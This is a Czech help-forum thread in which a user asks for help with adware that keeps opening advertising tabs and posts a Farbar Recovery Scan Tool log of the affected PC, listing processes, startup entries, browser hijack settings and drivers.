Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

neustale vyskakuji zalozky s reklamou

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Zpráva
Autor
martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

neustale vyskakuji zalozky s reklamou

#1 Příspěvek od martybx »

dobry den, poprosim o kontrolu pc. Bratrankovi zacaly neustale skakat nove zalozky s reklamami na idnes a na jine zahranicni zpravodajske portaly.. Prosim o pomoc jak se toho zbavit.
Dekuji
log:

Kód: Vybrat vše

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09-09-2020
Ran by Milan (administrator) on DESKTOP-AJHPLSQ (Gigabyte Technology Co., Ltd. GA-770T-D3L) (11-09-2020 14:27:29)
Running from C:\Users\Milan\Desktop
Loaded Profiles: Milan
Platform: Windows 10 Home Version 1909 18363.1016 (X64) Language: Čeština (Česko)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTAgent.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Ultra\DTShellHlp.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswEngSrv.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\aswidsagent.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGSvc.exe
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\AVGUI.exe <2>
(AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Antivirus\wsc_proxy.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler.exe
(AVG Technologies USA, LLC -> AVG Technologies) C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\AVGBrowserCrashHandler64.exe
(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(LAVASOFT SOFTWARE CANADA INC -> Lavasoft) C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Milan\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.8043.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.8043.0_x64__8wekyb3d8bbwe\GameBarFT.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <6>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe <2>
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(philandro Software GmbH -> philandro Software GmbH) C:\Program Files (x86)\AnyDesk\AnyDesk.exe <3>
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\spool\drivers\x64\3\E_YATIUNE.EXE <2>
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe <6>

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AVGUI.exe] => C:\Program Files\AVG\Antivirus\AvLaunch.exe [156808 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646776 2020-03-12] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [DiskFixer] => C:\Program Files (x86)\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files\DAEMON Tools Ultra\DTAgent.exe [451952 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [90951544 2020-09-08] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [EPLTarget\P0000000000000001] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIUNE.EXE [416896 2017-09-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [8146520 2020-08-29] (LAVASOFT SOFTWARE CANADA INC -> Lavasoft)
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe" 
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf90-6b63-11ea-bac1-1c6f6553bf1c} - "H:\setup.exe" 
HKLM\...\Print\Monitors\EPSON L3150 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBUNE.DLL [184832 2017-07-14] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\EpsonNet Print Port: C:\WINDOWS\system32\enppmon.dll [500736 2016-09-14] (SEIKO EPSON CORPORATION) [File not signed]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{48F69C39-1356-4A7B-A899-70E3539D4982}] -> C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\Installer\chrmstp.exe [2020-09-10] (AVG Technologies USA, LLC -> AVG Technologies)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2020-03-21]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08C10116-0F05-4F1B-AF73-06B589373F46} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14679256 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {08E8831B-9A9D-4E04-A6EB-BD404165222C} - System32\Tasks\Antivirus Emergency Update => C:\Program Files\AVG\Antivirus\AvEmUpdate.exe [3858056 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
Task: {0F26C413-9F83-4AF2-812E-BAA9DD4D1CD7} - System32\Tasks\AVGUpdateTaskMachineCore => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {2F09ED43-2A3D-464C-B5E5-B157022CE7EB} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_433_Plugin.exe [1502264 2020-09-08] (Adobe Inc. -> Adobe)
Task: {53EE07E4-1B5A-4925-9B87-CA84FDB1ED99} - System32\Tasks\AVGUpdateTaskMachineUA => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {79E87EF1-4D71-44FC-8873-A72C39CD80FC} - System32\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {7A446EC8-82DB-4A54-945E-27A566D3080B} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [660688 2020-09-02] (Mozilla Corporation -> Mozilla Foundation)
Task: {94BE50EC-EFA1-4E08-9A28-6830D1121378} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2020-03-21] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {95CA5060-B138-497D-90C3-645A155D24D6} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [1792136 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A77F7A79-4A0D-4E72-958D-1F2DA35B6B16} - System32\Tasks\AVG Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {A86F3AA5-DE31-43BF-9913-2D9A69740383} - System32\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {BC8897D4-CC61-4362-8CDD-944E4953143E} - System32\Tasks\AVG Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe [2100880 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {EA92647F-8039-4B01-9080-AE7111B54CD3} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {3B3152EA-857D-47CF-AB25-91BD1A979357}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{3B3152EA-857D-47CF-AB25-91BD1A979357} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\EPSON L3150 Series Update {82897F20-ADA3-49EB-B2E4-DAED68663EB8}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSUNE.EXE:/EXE:{82897F20-ADA3-49EB-B2E4-DAED68663EB8} /F:UpdateWORKGROUP\DESKTOP-AJHPLSQ$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 213.46.172.37 213.46.172.36
Tcpip\..\Interfaces\{e8de9f77-ea67-4223-a7f4-f48222bdaf84}: [DhcpNameServer] 213.46.172.37 213.46.172.36

Internet Explorer:
==================
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-29 03:31:11&bName=
SearchScopes: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\ssv.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\jp2ssv.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)

Edge: 
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Milan\AppData\Local\Microsoft\Edge\User Data\Default [2020-09-11]
Edge Extension: (Microsoft Protect) - C:\Users\Milan\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fcppdfelojakeahklfgkjegnpbgndoch [2020-08-29]

FireFox:
========
FF DefaultProfile: omklf3yt.default
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\omklf3yt.default [2020-08-29]
FF NewTab: Mozilla\Firefox\Profiles\omklf3yt.default -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-08-29 03:31:11&bName=
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release [2020-09-11]
FF Notifications: Mozilla\Firefox\Profiles\nh2u98jr.default-release -> hxxps://cs70.divokekmeny.cz
FF Extension: (Mozilla Official) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} [2020-08-29] [not signed]
FF Extension: (Greasemonkey) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-03-18]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @java.com/DTPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\dtplugin\npDeployJava1.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\plugin2\npjp2.dll [2020-05-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=3 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=9 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @videolan.org/vlc,version=3.0.10 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.11 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)
R2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3668944 2020-08-08] (philandro Software GmbH -> philandro Software GmbH)
S2 avg; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AVG Antivirus; C:\Program Files\AVG\Antivirus\AVGSvc.exe [354272 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 avgbIDSAgent; C:\Program Files\AVG\Antivirus\aswidsagent.exe [7823296 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 avgm; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
S3 AVGSecureBrowserElevationService; C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\elevation_service.exe [1343656 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AvgWscReporter; C:\Program Files\AVG\Antivirus\wsc_proxy.exe [110608 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 Disc Soft Ultra Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe [6986096 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2019-09-19] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [29272 2020-08-29] (LAVASOFT SOFTWARE CANADA INC -> )
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\NisSrv.exe [2169568 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\MsMpEng.exe [128376 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
S3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
R0 avgArDisk; C:\WINDOWS\System32\drivers\avgArDisk.sys [37208 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgArPot; C:\WINDOWS\System32\drivers\avgArPot.sys [205952 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgbidsdriver; C:\WINDOWS\System32\drivers\avgbidsdriver.sys [235656 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbidsh; C:\WINDOWS\System32\drivers\avgbidsh.sys [195720 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbuniv; C:\WINDOWS\System32\drivers\avgbuniv.sys [61064 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgElam; C:\WINDOWS\System32\drivers\avgElam.sys [16320 2020-08-29] (Microsoft Windows Early Launch Anti-malware Publisher -> AVG Technologies CZ, s.r.o.)
R1 avgKbd; C:\WINDOWS\System32\drivers\avgKbd.sys [42840 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgMonFlt; C:\WINDOWS\System32\drivers\avgMonFlt.sys [175264 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgNetHub; C:\WINDOWS\System32\drivers\avgNetHub.sys [515600 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\WINDOWS\System32\drivers\avgRdr2.sys [109336 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgRvrt; C:\WINDOWS\System32\drivers\avgRvrt.sys [84912 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSnx; C:\WINDOWS\System32\drivers\avgSnx.sys [851664 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSP; C:\WINDOWS\System32\drivers\avgSP.sys [466816 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgStm; C:\WINDOWS\System32\drivers\avgStm.sys [217392 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgVmm; C:\WINDOWS\System32\drivers\avgVmm.sys [323848 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2020-01-09] (Microsoft Corporation) [File not signed]
R3 dtultrascsibus; C:\WINDOWS\System32\drivers\dtultrascsibus.sys [42256 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtultrausbbus; C:\WINDOWS\System32\drivers\dtultrausbbus.sys [59344 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [78216 2020-08-05] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [430320 2020-08-05] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [98520 2020-08-05] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-11 14:27 - 2020-09-11 14:29 - 000020645 _____ C:\Users\Milan\Desktop\FRST.txt
2020-09-11 14:27 - 2020-09-11 14:28 - 000000000 ____D C:\FRST
2020-09-11 14:27 - 2020-09-11 14:27 - 000000000 _____ C:\Users\Milan\Desktop\Nový textový dokument.txt
2020-09-11 14:24 - 2020-09-11 14:25 - 002297344 _____ (Farbar) C:\Users\Milan\Desktop\FRST64.exe
2020-09-09 07:11 - 2020-09-09 07:11 - 000000000 ____D C:\Users\Milan\AppData\Local\CrashDumps
2020-09-09 07:03 - 2020-09-09 07:03 - 001728079 _____ C:\Users\Milan\Downloads\pz_II_c_87_01.rar
2020-09-06 14:21 - 2020-09-06 15:02 - 733129592 _____ C:\Users\Milan\Downloads\Šifra mistra Leonarda super film cz dabing dvdrip.avi
2020-09-06 12:20 - 2020-09-06 13:13 - 932525132 _____ C:\Users\Milan\Downloads\Apocalipto.avi
2020-09-02 20:01 - 2020-09-02 20:01 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-09-02 15:58 - 2020-09-02 20:04 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-08-30 12:28 - 2020-08-30 14:19 - 1992979015 _____ C:\Users\Milan\Downloads\The.Debt.Collectors.2.2020.PROPER.1080p.WEBRip.x264-RARBG.mp4
2020-08-29 22:45 - 2020-09-10 15:06 - 000002375 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-09-10 15:06 - 000002340 _____ C:\Users\Public\Desktop\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-08-29 22:45 - 000003826 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Hourly)
2020-08-29 22:45 - 2020-08-29 22:45 - 000003242 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Logon)
2020-08-29 22:41 - 2020-08-29 22:41 - 000003468 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineUA
2020-08-29 22:41 - 2020-08-29 22:41 - 000003344 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineCore
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ___HD C:\$AV_AVG
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\AVG
2020-08-29 22:40 - 2020-08-29 22:45 - 000000000 ____D C:\Users\Milan\AppData\Local\Avg
2020-08-29 22:40 - 2020-08-29 22:40 - 000002075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000002063 _____ C:\Users\Public\Desktop\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Roaming\AVG
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Local\CEF
2020-08-29 22:39 - 2020-09-02 14:57 - 000004266 _____ C:\WINDOWS\system32\Tasks\Antivirus Emergency Update
2020-08-29 22:39 - 2020-08-29 22:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-08-29 22:38 - 2020-08-29 22:39 - 000323848 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000851664 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSnx.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000515600 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetHub.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000466816 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000336520 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2020-08-29 22:38 - 2020-08-29 22:38 - 000235656 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdriver.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000217392 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000205952 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArPot.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000195720 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsh.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000175264 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000109336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000084912 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000061064 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniv.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000042840 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgKbd.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000037208 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArDisk.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000016320 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgElam.sys
